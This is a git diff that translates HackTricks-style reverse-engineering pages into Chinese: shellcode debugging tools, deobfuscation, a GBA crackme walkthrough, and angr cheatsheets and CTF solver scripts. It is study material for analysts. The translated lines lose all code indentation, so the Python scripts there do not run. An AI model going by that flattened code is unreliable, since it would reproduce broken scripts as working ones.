+[**Blobrunner**](https://github.com/OALabs/BlobRunner) 将 **分配** shellcode 到内存空间，将 **指示** 您 shellcode 被分配的 **内存地址** 并将 **停止** 执行。\
+然后，您需要 **附加调试器**（Ida 或 x64dbg）到该进程，并在 **指示的内存地址** 设置一个 **断点** 并 **恢复** 执行。这样您将调试 shellcode。
 
-The releases github page contains zips containing the compiled releases: [https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5)\
-You can find a slightly modified version of Blobrunner in the following link. In order to compile it just **create a C/C++ project in Visual Studio Code, copy and paste the code and build it**.
+发布的 GitHub 页面包含包含已编译版本的 zip 文件：[https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5)\
+您可以在以下链接找到稍微修改过的 Blobrunner 版本。为了编译它，只需 **在 Visual Studio Code 中创建一个 C/C++ 项目，复制并粘贴代码并构建它**。
 
 {{#ref}}
 blobrunner.md
 {{#endref}}
 
-### Debugging a shellcode with jmp2it
+### 使用 jmp2it 调试 shellcode
 
-[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode.
+[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4) 与 blobrunner 非常相似。它将 **分配** shellcode 到内存空间，并启动一个 **无限循环**。然后，您需要 **附加调试器** 到该进程，**播放开始等待 2-5 秒并按停止**，您将发现自己处于 **无限循环** 中。跳到无限循环的下一条指令，因为它将是对 shellcode 的调用，最后您将发现自己正在执行 shellcode。
 
 ![](<../../images/image (509).png>)
 
-You can download a compiled version of [jmp2it inside the releases page](https://github.com/adamkramer/jmp2it/releases/).
+您可以在 [jmp2it 的发布页面](https://github.com/adamkramer/jmp2it/releases/) 下载已编译版本。
 
-### Debugging shellcode using Cutter
+### 使用 Cutter 调试 shellcode
 
-[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically.
+[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) 是 radare 的 GUI。使用 cutter，您可以模拟 shellcode 并动态检查它。
 
-Note that Cutter allows you to "Open File" and "Open Shellcode". In my case when I opened the shellcode as a file it decompiled it correctly, but when I opened it as a shellcode it didn't:
+请注意，Cutter 允许您 "Open File" 和 "Open Shellcode"。在我的情况下，当我将 shellcode 作为文件打开时，它正确反编译，但当我将其作为 shellcode 打开时却没有：
 
 ![](<../../images/image (562).png>)
 
-In order to start the emulation in the place you want to, set a bp there and apparently cutter will automatically start the emulation from there:
+为了在您想要的地方开始模拟，请在那里设置一个 bp，显然 cutter 将自动从那里开始模拟：
 
 ![](<../../images/image (589).png>)
 
 ![](<../../images/image (387).png>)
 
-You can see the stack for example inside a hex dump:
+您可以在十六进制转储中查看堆栈，例如：
 
 ![](<../../images/image (186).png>)
 
-### Deobfuscating shellcode and getting executed functions
-
-You should try [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7&pid=152).\
-It will tell you things like **which functions** is the shellcode using and if the shellcode is **decoding** itself in memory.
+### 反混淆 shellcode 并获取执行的函数
 
+您应该尝试 [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7&pid=152)。\
+它将告诉您 shellcode 使用了 **哪些函数**，以及 shellcode 是否在内存中 **解码** 自身。
 ```bash
 scdbg.exe -f shellcode # Get info
 scdbg.exe -f shellcode -r #show analysis report at end of run
@@ -221,67 +210,64 @@ scdbg.exe -f shellcode -d #Dump decoded shellcode
 scdbg.exe -f shellcode /findsc #Find offset where starts
 scdbg.exe -f shellcode /foff 0x0000004D #Start the executing in that offset
 ```
-
-scDbg also counts with a graphical launcher where you can select the options you want and execute the shellcode
+scDbg 还配备了一个图形启动器，您可以选择所需的选项并执行 shellcode。
 
 ![](<../../images/image (258).png>)
 
-The **Create Dump** option will dump the final shellcode if any change is done to the shellcode dynamically in memory (useful to download the decoded shellcode). The **start offset** can be useful to start the shellcode at a specific offset. The **Debug Shell** option is useful to debug the shellcode using the scDbg terminal (however I find any of the options explained before better for this matter as you will be able to use Ida or x64dbg).
+**Create Dump** 选项将在内存中对 shellcode 进行动态更改时转储最终的 shellcode（用于下载解码后的 shellcode）。**start offset** 可以用于在特定偏移量处启动 shellcode。**Debug Shell** 选项对于使用 scDbg 终端调试 shellcode 很有用（然而，我发现之前解释的任何选项在这方面更好，因为您可以使用 Ida 或 x64dbg）。
 
-### Disassembling using CyberChef
+### 使用 CyberChef 反汇编
 
-Upload your shellcode file as input and use the following recipe to decompile it: [https://gchq.github.io/CyberChef/#recipe=To_Hex('Space',0)Disassemble_x86('32','Full%20x86%20architecture',16,0,true,true)](<https://gchq.github.io/CyberChef/#recipe=To_Hex('Space',0)Disassemble_x86('32','Full%20x86%20architecture',16,0,true,true)>)
+将您的 shellcode 文件上传为输入，并使用以下配方进行反编译：[https://gchq.github.io/CyberChef/#recipe=To_Hex('Space',0)Disassemble_x86('32','Full%20x86%20architecture',16,0,true,true)](<https://gchq.github.io/CyberChef/#recipe=To_Hex('Space',0)Disassemble_x86('32','Full%20x86%20architecture',16,0,true,true)>)
 
 ## [Movfuscator](https://github.com/xoreaxeaxeax/movfuscator)
 
-This obfuscator **modifies all the instructions for `mov`**(yeah, really cool). It also uses interruptions to change executions flows. For more information about how does it works:
+这个混淆器**修改所有的 `mov` 指令**（是的，真的很酷）。它还使用中断来改变执行流程。有关其工作原理的更多信息：
 
 - [https://www.youtube.com/watch?v=2VF_wPkiBJY](https://www.youtube.com/watch?v=2VF_wPkiBJY)
 - [https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas_2015_the_movfuscator.pdf](https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas_2015_the_movfuscator.pdf)
 
-If you are lucky [demovfuscator](https://github.com/kirschju/demovfuscator) will deofuscate the binary. It has several dependencies
-
+如果您运气好，[demovfuscator](https://github.com/kirschju/demovfuscator) 将解混淆该二进制文件。它有几个依赖项。
 ```
 apt-get install libcapstone-dev
 apt-get install libz3-dev
 ```
+并且[安装 keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md)（`apt-get install cmake; mkdir build; cd build; ../make-share.sh; make install`）
 
-And [install keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md) (`apt-get install cmake; mkdir build; cd build; ../make-share.sh; make install`)
-
-If you are playing a **CTF, this workaround to find the flag** could be very useful: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html)
+如果你在玩**CTF，这个找到标志的变通方法**可能非常有用：[https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html)
 
 ## Rust
 
-To find the **entry point** search the functions by `::main` like in:
+要找到**入口点**，可以通过`::main`搜索函数，如下所示：
 
 ![](<../../images/image (1080).png>)
 
-In this case the binary was called authenticator, so it's pretty obvious that this is the interesting main function.\
-Having the **name** of the **functions** being called, search for them on the **Internet** to learn about their **inputs** and **outputs**.
+在这种情况下，二进制文件被称为authenticator，所以很明显这是有趣的主函数。\
+拥有被调用的**函数**的**名称**后，在**互联网上**搜索它们以了解它们的**输入**和**输出**。
 
 ## **Delphi**
 
-For Delphi compiled binaries you can use [https://github.com/crypto2011/IDR](https://github.com/crypto2011/IDR)
+对于Delphi编译的二进制文件，你可以使用[https://github.com/crypto2011/IDR](https://github.com/crypto2011/IDR)
 
-If you have to reverse a Delphi binary I would suggest you to use the IDA plugin [https://github.com/Coldzer0/IDA-For-Delphi](https://github.com/Coldzer0/IDA-For-Delphi)
+如果你需要反向工程一个Delphi二进制文件，我建议你使用IDA插件[https://github.com/Coldzer0/IDA-For-Delphi](https://github.com/Coldzer0/IDA-For-Delphi)
 
-Just press **ATL+f7** (import python plugin in IDA) and select the python plugin.
+只需按**ATL+f7**（在IDA中导入python插件）并选择python插件。
 
-This plugin will execute the binary and resolve function names dynamically at the start of the debugging. After starting the debugging press again the Start button (the green one or f9) and a breakpoint will hit in the beginning of the real code.
+该插件将在调试开始时执行二进制文件并动态解析函数名称。开始调试后，再次按下开始按钮（绿色按钮或f9），断点将在真实代码的开头命中。
 
-It is also very interesting because if you press a button in the graphic application the debugger will stop in the function executed by that bottom.
+这也非常有趣，因为如果你在图形应用程序中按下一个按钮，调试器将停止在该按钮执行的函数中。
 
 ## Golang
 
-If you have to reverse a Golang binary I would suggest you to use the IDA plugin [https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper)
+如果你需要反向工程一个Golang二进制文件，我建议你使用IDA插件[https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper)
 
-Just press **ATL+f7** (import python plugin in IDA) and select the python plugin.
+只需按**ATL+f7**（在IDA中导入python插件）并选择python插件。
 
-This will resolve the names of the functions.
+这将解析函数的名称。
 
-## Compiled Python
+## 编译的 Python
 
-In this page you can find how to get the python code from an ELF/EXE python compiled binary:
+在此页面中，你可以找到如何从ELF/EXE Python编译的二进制文件中获取Python代码：
 
 {{#ref}}
 ../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
@@ -289,19 +275,18 @@ In this page you can find how to get the python code from an ELF/EXE python comp
 
 ## GBA - Game Body Advance
 
-If you get the **binary** of a GBA game you can use different tools to **emulate** and **debug** it:
+如果你获得了GBA游戏的**二进制文件**，你可以使用不同的工具来**模拟**和**调试**它：
 
-- [**no$gba**](https://problemkaputt.de/gba.htm) (_Download the debug version_) - Contains a debugger with interface
-- [**mgba** ](https://mgba.io)- Contains a CLI debugger
-- [**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) - Ghidra plugin
-- [**GhidraGBA**](https://github.com/SiD3W4y/GhidraGBA) - Ghidra plugin
+- [**no$gba**](https://problemkaputt.de/gba.htm)（_下载调试版本_）- 包含带界面的调试器
+- [**mgba** ](https://mgba.io) - 包含CLI调试器
+- [**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) - Ghidra插件
+- [**GhidraGBA**](https://github.com/SiD3W4y/GhidraGBA) - Ghidra插件
 
-In [**no$gba**](https://problemkaputt.de/gba.htm), in _**Options --> Emulation Setup --> Controls**_\*\* \*\* you can see how to press the Game Boy Advance **buttons**
+在[**no$gba**](https://problemkaputt.de/gba.htm)中，_**选项 --> 模拟设置 --> 控制**_\*\* \*\*你可以看到如何按下Game Boy Advance的**按钮**
 
 ![](<../../images/image (581).png>)
 
-When pressed, each **key has a value** to identify it:
-
+按下时，每个**键都有一个值**来识别它：
 ```
 A = 1
 B = 2
@@ -314,100 +299,92 @@ DOWN = 128
 R = 256
 L = 256
 ```
-
-So, in this kind of program, the interesting part will be **how the program treats the user input**. In the address **0x4000130** you will find the commonly found function: **KEYINPUT**.
+在这种程序中，令人感兴趣的部分将是**程序如何处理用户输入**。在地址**0x4000130**，你会找到常见的函数：**KEYINPUT**。
 
 ![](<../../images/image (447).png>)
 
-In the previous image you can find that the function is called from **FUN_080015a8** (addresses: _0x080015fa_ and _0x080017ac_).
-
-In that function, after some init operations (without any importance):
+在前面的图像中，你可以看到该函数是从**FUN_080015a8**调用的（地址：_0x080015fa_ 和 _0x080017ac_）。
 
+在该函数中，在一些初始化操作之后（没有任何重要性）：
 ```c
 void FUN_080015a8(void)
 
 {
-  ushort uVar1;
-  undefined4 uVar2;
-  undefined4 uVar3;
-  ushort uVar4;
-  int iVar5;
-  ushort *puVar6;
-  undefined *local_2c;
+ushort uVar1;
+undefined4 uVar2;
+undefined4 uVar3;
+ushort uVar4;
+int iVar5;
+ushort *puVar6;
+undefined *local_2c;
 
-  DISPCNT = 0x1140;
-  FUN_08000a74();
-  FUN_08000ce4(1);
-  DISPCNT = 0x404;
-  FUN_08000dd0(&DAT_02009584,0x6000000,&DAT_030000dc);
-  FUN_08000354(&DAT_030000dc,0x3c);
-  uVar4 = DAT_030004d8;
+DISPCNT = 0x1140;
+FUN_08000a74();
+FUN_08000ce4(1);
+DISPCNT = 0x404;
+FUN_08000dd0(&DAT_02009584,0x6000000,&DAT_030000dc);
+FUN_08000354(&DAT_030000dc,0x3c);
+uVar4 = DAT_030004d8;
 ```
-
-It's found this code:
-
+找到这段代码：
 ```c
-  do {
-    DAT_030004da = uVar4; //This is the last key pressed
-    DAT_030004d8 = KEYINPUT | 0xfc00;
-    puVar6 = &DAT_0200b03c;
-    uVar4 = DAT_030004d8;
-    do {
-      uVar2 = DAT_030004dc;
-      uVar1 = *puVar6;
-      if ((uVar1 & DAT_030004da & ~uVar4) != 0) {
+do {
+DAT_030004da = uVar4; //This is the last key pressed
+DAT_030004d8 = KEYINPUT | 0xfc00;
+puVar6 = &DAT_0200b03c;
+uVar4 = DAT_030004d8;
+do {
+uVar2 = DAT_030004dc;
+uVar1 = *puVar6;
+if ((uVar1 & DAT_030004da & ~uVar4) != 0) {
 ```
-
-The last if is checking **`uVar4`** is in the **last Keys** and not is the current key, also called letting go off a button (current key is stored in **`uVar1`**).
-
+最后的 if 检查 **`uVar4`** 是否在 **最后的 Keys** 中，并且不是当前键，也称为放开一个按钮（当前键存储在 **`uVar1`** 中）。
 ```c
-        if (uVar1 == 4) {
-          DAT_030000d4 = 0;
-          uVar3 = FUN_08001c24(DAT_030004dc);
-          FUN_08001868(uVar2,0,uVar3);
-          DAT_05000000 = 0x1483;
-          FUN_08001844(&DAT_0200ba18);
-          FUN_08001844(&DAT_0200ba20,&DAT_0200ba40);
-          DAT_030000d8 = 0;
-          uVar4 = DAT_030004d8;
-        }
-        else {
-          if (uVar1 == 8) {
-            if (DAT_030000d8 == 0xf3) {
-              DISPCNT = 0x404;
-              FUN_08000dd0(&DAT_02008aac,0x6000000,&DAT_030000dc);
-              FUN_08000354(&DAT_030000dc,0x3c);
-              uVar4 = DAT_030004d8;
-            }
-          }
-          else {
-            if (DAT_030000d4 < 8) {
-              DAT_030000d4 = DAT_030000d4 + 1;
-              FUN_08000864();
-              if (uVar1 == 0x10) {
-                DAT_030000d8 = DAT_030000d8 + 0x3a;
+if (uVar1 == 4) {
+DAT_030000d4 = 0;
+uVar3 = FUN_08001c24(DAT_030004dc);
+FUN_08001868(uVar2,0,uVar3);
+DAT_05000000 = 0x1483;
+FUN_08001844(&DAT_0200ba18);
+FUN_08001844(&DAT_0200ba20,&DAT_0200ba40);
+DAT_030000d8 = 0;
+uVar4 = DAT_030004d8;
+}
+else {
+if (uVar1 == 8) {
+if (DAT_030000d8 == 0xf3) {
+DISPCNT = 0x404;
+FUN_08000dd0(&DAT_02008aac,0x6000000,&DAT_030000dc);
+FUN_08000354(&DAT_030000dc,0x3c);
+uVar4 = DAT_030004d8;
+}
+}
+else {
+if (DAT_030000d4 < 8) {
+DAT_030000d4 = DAT_030000d4 + 1;
+FUN_08000864();
+if (uVar1 == 0x10) {
+DAT_030000d8 = DAT_030000d8 + 0x3a;
 ```
+在前面的代码中，您可以看到我们正在将 **uVar1**（按下按钮的 **值** 所在的位置）与一些值进行比较：
 
-In the previous code you can see that we are comparing **uVar1** (the place where the **value of the pressed button** is) with some values:
+- 首先，它与 **值 4**（**SELECT** 按钮）进行比较：在这个挑战中，这个按钮清除屏幕
+- 然后，它与 **值 8**（**START** 按钮）进行比较：在这个挑战中，这检查代码是否有效以获取标志。
+- 在这种情况下，变量 **`DAT_030000d8`** 与 0xf3 进行比较，如果值相同，则执行某些代码。
+- 在其他情况下，检查某个 cont（`DAT_030000d4`）。这是一个 cont，因为在进入代码后立即加 1。\
+**如果** 小于 8，则执行涉及 **添加** 值到 **`DAT_030000d8`** 的操作（基本上是将按下的键的值添加到这个变量中，只要 cont 小于 8）。
 
-- First, it's compared with the **value 4** (**SELECT** button): In the challenge this button clears the screen
-- Then, it's comparing it with the **value 8** (**START** button): In the challenge this checks is the code is valid to get the flag.
-  - In this case the var **`DAT_030000d8`** is compared with 0xf3 and if the value is the same some code is executed.
-- In any other cases, some cont (`DAT_030000d4`) is checked. It's a cont because it's adding 1 right after entering in the code.\
-  **I**f less than 8 something that involves **adding** values to \*\*`DAT_030000d8` \*\* is done (basically it's adding the values of the keys pressed in this variable as long as the cont is less than 8).
+因此，在这个挑战中，知道按钮的值，您需要 **按下一个长度小于 8 的组合，使得结果的和为 0xf3。**
 
-So, in this challenge, knowing the values of the buttons, you needed to **press a combination with a length smaller than 8 that the resulting addition is 0xf3.**
-
-**Reference for this tutorial:** [**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/)
+**本教程的参考：** [**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/)
 
 ## Game Boy
 
 {% embed url="https://www.youtube.com/watch?v=VVbRe7wr3G4" %}
 
-## Courses
+## 课程
 
 - [https://github.com/0xZ0F/Z0FCourse_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse_ReverseEngineering)
-- [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation)
+- [https://github.com/malrev/ABD](https://github.com/malrev/ABD) （二进制去混淆）
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing/reversing-tools-basic-methods/angr/README.md b/src/reversing/reversing-tools-basic-methods/angr/README.md
index 6e4ef0b11..d10e866b1 100644
--- a/src/reversing/reversing-tools-basic-methods/angr/README.md
+++ b/src/reversing/reversing-tools-basic-methods/angr/README.md
@@ -1,9 +1,8 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
-Part of this cheatsheet is based on the [angr documentation](https://docs.angr.io/_/downloads/en/stable/pdf/).
-
-# Installation
+本备忘单的一部分基于 [angr documentation](https://docs.angr.io/_/downloads/en/stable/pdf/)。
 
+# 安装
 ```bash
 sudo apt-get install python3-dev libffi-dev build-essential
 python3 -m pip install --user virtualenv
@@ -11,9 +10,7 @@ python3 -m venv ang
 source ang/bin/activate
 pip install angr
 ```
-
-# Basic Actions
-
+# 基本操作
 ```python
 import angr
 import monkeyhex # this will format numerical results in hexadecimal
@@ -31,11 +28,9 @@ proj.filename #Get filename "/bin/true"
 #Usually you won't need to use them but you could
 angr.Project('examples/fauxware/fauxware', main_opts={'backend': 'blob', 'arch': 'i386'}, lib_opts={'libc.so.6': {'backend': 'elf'}})
 ```
+# 加载的和主对象信息
 
-# Loaded and Main object information
-
-## Loaded Data
-
+## 加载的数据
 ```python
 #LOADED DATA
 proj.loader #<Loaded true, maps [0x400000:0x5004000]>
@@ -45,22 +40,20 @@ proj.loader.all_objects #All loaded
 proj.loader.shared_objects #Loaded binaries
 """
 OrderedDict([('true', <ELF Object true, maps [0x400000:0x40a377]>),
-             ('libc.so.6',
-              <ELF Object libc-2.31.so, maps [0x500000:0x6c4507]>),
-             ('ld-linux-x86-64.so.2',
-              <ELF Object ld-2.31.so, maps [0x700000:0x72c177]>),
-             ('extern-address space',
-              <ExternObject Object cle##externs, maps [0x800000:0x87ffff]>),
-             ('cle##tls',
-              <ELFTLSObjectV2 Object cle##tls, maps [0x900000:0x91500f]>)])
+('libc.so.6',
+<ELF Object libc-2.31.so, maps [0x500000:0x6c4507]>),
+('ld-linux-x86-64.so.2',
+<ELF Object ld-2.31.so, maps [0x700000:0x72c177]>),
+('extern-address space',
+<ExternObject Object cle##externs, maps [0x800000:0x87ffff]>),
+('cle##tls',
+<ELFTLSObjectV2 Object cle##tls, maps [0x900000:0x91500f]>)])
 """
 proj.loader.all_elf_objects #Get all ELF objects loaded (Linux)
 proj.loader.all_pe_objects #Get all binaries loaded (Windows)
 proj.loader.find_object_containing(0x400000)#Get object loaded in an address "<ELF Object fauxware, maps [0x400000:0x60105f]>"
 ```
-
-## Main Object
-
+## 主要目标
 ```python
 #Main Object (main binary loaded)
 obj = proj.loader.main_object #<ELF Object true, maps [0x400000:0x60721f]>
@@ -74,9 +67,7 @@ obj.find_section_containing(obj.entry) #Get section by address
 obj.plt['strcmp'] #Get plt address of a funcion (0x400550)
 obj.reverse_plt[0x400550] #Get function from plt address ('strcmp')
 ```
-
-## Symbols and Relocations
-
+## 符号和重定位
 ```python
 strcmp = proj.loader.find_symbol('strcmp') #<Symbol "strcmp" in libc.so.6 at 0x1089cd0>
 
@@ -93,9 +84,7 @@ main_strcmp.is_export #False
 main_strcmp.is_import #True
 main_strcmp.resolvedby #<Symbol "strcmp" in libc.so.6 at 0x1089cd0>
 ```
-
-## Blocks
-
+## 块
 ```python
 #Blocks
 block = proj.factory.block(proj.entry) #Get the block of the entrypoint fo the binary
@@ -103,11 +92,9 @@ block.pp() #Print disassembly of the block
 block.instructions #"0xb" Get number of instructions
 block.instruction_addrs #Get instructions addresses "[0x401670, 0x401672, 0x401675, 0x401676, 0x401679, 0x40167d, 0x40167e, 0x40167f, 0x401686, 0x40168d, 0x401694]"
 ```
+# 动态分析
 
-# Dynamic Analysis
-
-## Simulation Manager, States
-
+## 仿真管理器，状态
 ```python
 #Live States
 #This is useful to modify content in a live analysis
@@ -130,15 +117,13 @@ simgr = proj.factory.simulation_manager(state) #Start
 simgr.step() #Execute one step
 simgr.active[0].regs.rip #Get RIP from the last state
 ```
+## 调用函数
 
-## Calling functions
-
-- You can pass a list of arguments through `args` and a dictionary of environment variables through `env` into `entry_state` and `full_init_state`. The values in these structures can be strings or bitvectors, and will be serialized into the state as the arguments and environment to the simulated execution. The default `args` is an empty list, so if the program you're analyzing expects to find at least an `argv[0]`, you should always provide that!
-- If you'd like to have `argc` be symbolic, you can pass a symbolic bitvector as `argc` to the `entry_state` and `full_init_state` constructors. Be careful, though: if you do this, you should also add a constraint to the resulting state that your value for argc cannot be larger than the number of args you passed into `args`.
-- To use the call state, you should call it with `.call_state(addr, arg1, arg2, ...)`, where `addr` is the address of the function you want to call and `argN` is the Nth argument to that function, either as a python integer, string, or array, or a bitvector. If you want to have memory allocated and actually pass in a pointer to an object, you should wrap it in an PointerWrapper, i.e. `angr.PointerWrapper("point to me!")`. The results of this API can be a little unpredictable, but we're working on it.
-
-## BitVectors
+- 你可以通过 `args` 传递参数列表，通过 `env` 传递环境变量字典到 `entry_state` 和 `full_init_state`。这些结构中的值可以是字符串或位向量，并将被序列化为模拟执行的参数和环境。默认的 `args` 是一个空列表，因此如果你分析的程序期望至少找到一个 `argv[0]`，你应该始终提供它！
+- 如果你希望 `argc` 是符号的，可以将一个符号位向量作为 `argc` 传递给 `entry_state` 和 `full_init_state` 构造函数。不过要小心：如果这样做，你还应该向结果状态添加一个约束，确保你的 argc 值不能大于你传递给 `args` 的参数数量。
+- 要使用调用状态，你应该使用 `.call_state(addr, arg1, arg2, ...)` 调用它，其中 `addr` 是你想要调用的函数的地址，`argN` 是该函数的第 N 个参数，可以是 Python 整数、字符串、数组或位向量。如果你想分配内存并实际传递一个对象的指针，你应该将其包装在 PointerWrapper 中，即 `angr.PointerWrapper("point to me!")`。这个 API 的结果可能有点不可预测，但我们正在努力改进它。
 
+## 位向量
 ```python
 #BitVectors
 state = proj.factory.entry_state()
@@ -147,9 +132,7 @@ state.solver.eval(bv) #Convert BV to python int
 bv.zero_extend(30) #Will add 30 zeros on the left of the bitvector
 bv.sign_extend(30) #Will add 30 zeros or ones on the left of the BV extending the sign
 ```
-
-## Symbolic BitVectors & Constraints
-
+## 符号位向量与约束
 ```python
 x = state.solver.BVS("x", 64) #Symbolic variable BV of length 64
 y = state.solver.BVS("y", 64)
@@ -183,9 +166,7 @@ solver.eval_exact(expression, n) #n solutions to the given expression, throwing
 solver.min(expression) #minimum possible solution to the given expression.
 solver.max(expression) #maximum possible solution to the given expression.
 ```
-
-## Hooking
-
+## 钩子
 ```python
 >>> stub_func = angr.SIM_PROCEDURES['stubs']['ReturnUnconstrained'] # this is a CLASS
 >>> proj.hook(0x10000, stub_func())  # hook with an instance of the class
@@ -203,10 +184,8 @@ True
 >>> proj.is_hooked(0x20000)
 True
 ```
+此外，您可以使用 `proj.hook_symbol(name, hook)`，将符号的名称作为第一个参数，以挂钩符号所在的地址。
 
-Furthermore, you can use `proj.hook_symbol(name, hook)`, providing the name of a symbol as the first argument, to hook the address where the symbol lives
-
-# Examples
+# 示例
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md b/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md
index ea909b2ee..87e02587e 100644
--- a/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md
+++ b/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md
@@ -1,49 +1,46 @@
-# Angr - Examples
+# Angr - 示例
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 > [!NOTE]
-> If the program is using `scanf` to get **several values at once from stdin** you need to generate a state that starts after the **`scanf`**.
+> 如果程序使用 `scanf` 从 stdin **一次获取多个值**，您需要生成一个在 **`scanf`** 之后开始的状态。
 
-Codes taken from [https://github.com/jakespringer/angr_ctf](https://github.com/jakespringer/angr_ctf)
-
-### Input to reach address (indicating the address)
+代码来自 [https://github.com/jakespringer/angr_ctf](https://github.com/jakespringer/angr_ctf)
 
+### 输入以到达地址（指示地址）
 ```python
 import angr
 import sys
 
 def main(argv):
-  path_to_binary = argv[1]  # :string
-  project = angr.Project(path_to_binary)
+path_to_binary = argv[1]  # :string
+project = angr.Project(path_to_binary)
 
-  # Start in main()
-  initial_state = project.factory.entry_state()
-  # Start simulation
-  simulation = project.factory.simgr(initial_state)
+# Start in main()
+initial_state = project.factory.entry_state()
+# Start simulation
+simulation = project.factory.simgr(initial_state)
 
-  # Find the way yo reach the good address
-  good_address = 0x804867d
+# Find the way yo reach the good address
+good_address = 0x804867d
 
-  # Avoiding this address
-  avoid_address = 0x080485A8
-  simulation.explore(find=good_address, avoid=avoid_address)
+# Avoiding this address
+avoid_address = 0x080485A8
+simulation.explore(find=good_address, avoid=avoid_address)
 
-  # If found a way to reach the address
-  if simulation.found:
-    solution_state = simulation.found[0]
+# If found a way to reach the address
+if simulation.found:
+solution_state = simulation.found[0]
 
-    # Print the string that Angr wrote to stdin to follow solution_state
-    print(solution_state.posix.dumps(sys.stdin.fileno()))
-  else:
-    raise Exception('Could not find the solution')
+# Print the string that Angr wrote to stdin to follow solution_state
+print(solution_state.posix.dumps(sys.stdin.fileno()))
+else:
+raise Exception('Could not find the solution')
 
 if __name__ == '__main__':
-  main(sys.argv)
+main(sys.argv)
 ```
-
-### Input to reach address (indicating prints)
-
+### 输入以到达地址（指示打印）
 ```python
 # If you don't know the address you want to recah, but you know it's printing something
 # You can also indicate that info
@@ -52,35 +49,33 @@ import angr
 import sys
 
 def main(argv):
-  path_to_binary = argv[1]
-  project = angr.Project(path_to_binary)
-  initial_state = project.factory.entry_state()
-  simulation = project.factory.simgr(initial_state)
+path_to_binary = argv[1]
+project = angr.Project(path_to_binary)
+initial_state = project.factory.entry_state()
+simulation = project.factory.simgr(initial_state)
 
-  def is_successful(state):
-    #Successful print
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return b'Good Job.' in stdout_output
+def is_successful(state):
+#Successful print
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return b'Good Job.' in stdout_output
 
-  def should_abort(state):
-    #Avoid this print
-    stdout_output = state.posix.dumps(sys.stdout.fileno())
-    return b'Try again.' in stdout_output
+def should_abort(state):
+#Avoid this print
+stdout_output = state.posix.dumps(sys.stdout.fileno())
+return b'Try again.' in stdout_output
 
-  simulation.explore(find=is_successful, avoid=should_abort)
+simulation.explore(find=is_successful, avoid=should_abort)
 
-  if simulation.found:
-    solution_state = simulation.found[0]
-    print(solution_state.posix.dumps(sys.stdin.fileno()))
-  else:
-    raise Exception('Could not find the solution')
+if simulation.found:
+solution_state = simulation.found[0]
+print(solution_state.posix.dumps(sys.stdin.fileno()))
+else:
+raise Exception('Could not find the solution')
 
 if __name__ == '__main__':
-  main(sys.argv)
+main(sys.argv)
 ```
-
-### Registry values
-
+### 注册表值
 ```python
 # Angr doesn't currently support reading multiple things with scanf (Ex:
 # scanf("%u %u).) You will have to tell the simulation engine to begin the
@@ -91,62 +86,60 @@ import claripy
 import sys
 
 def main(argv):
-  path_to_binary = argv[1]
-  project = angr.Project(path_to_binary)
+path_to_binary = argv[1]
+project = angr.Project(path_to_binary)
 
-  # Address were you want to indicate the relation BitVector - registries
-  start_address = 0x80488d1
-  initial_state = project.factory.blank_state(addr=start_address)
+# Address were you want to indicate the relation BitVector - registries
+start_address = 0x80488d1
+initial_state = project.factory.blank_state(addr=start_address)
 
 
-  # Create Bit Vectors
-  password0_size_in_bits = 32  # :integer
-  password0 = claripy.BVS('password0', password0_size_in_bits)
+# Create Bit Vectors
+password0_size_in_bits = 32  # :integer
+password0 = claripy.BVS('password0', password0_size_in_bits)
 
-  password1_size_in_bits = 32  # :integer
-  password1 = claripy.BVS('password1', password1_size_in_bits)
+password1_size_in_bits = 32  # :integer
+password1 = claripy.BVS('password1', password1_size_in_bits)
 
-  password2_size_in_bits = 32  # :integer
-  password2 = claripy.BVS('password2', password2_size_in_bits)
+password2_size_in_bits = 32  # :integer
+password2 = claripy.BVS('password2', password2_size_in_bits)
 
-  # Relate it Vectors with the registriy values you are interested in to reach an address
-  initial_state.regs.eax = password0
-  initial_state.regs.ebx = password1
-  initial_state.regs.edx = password2
+# Relate it Vectors with the registriy values you are interested in to reach an address
+initial_state.regs.eax = password0
+initial_state.regs.ebx = password1
+initial_state.regs.edx = password2
 
-  simulation = project.factory.simgr(initial_state)
+simulation = project.factory.simgr(initial_state)
 
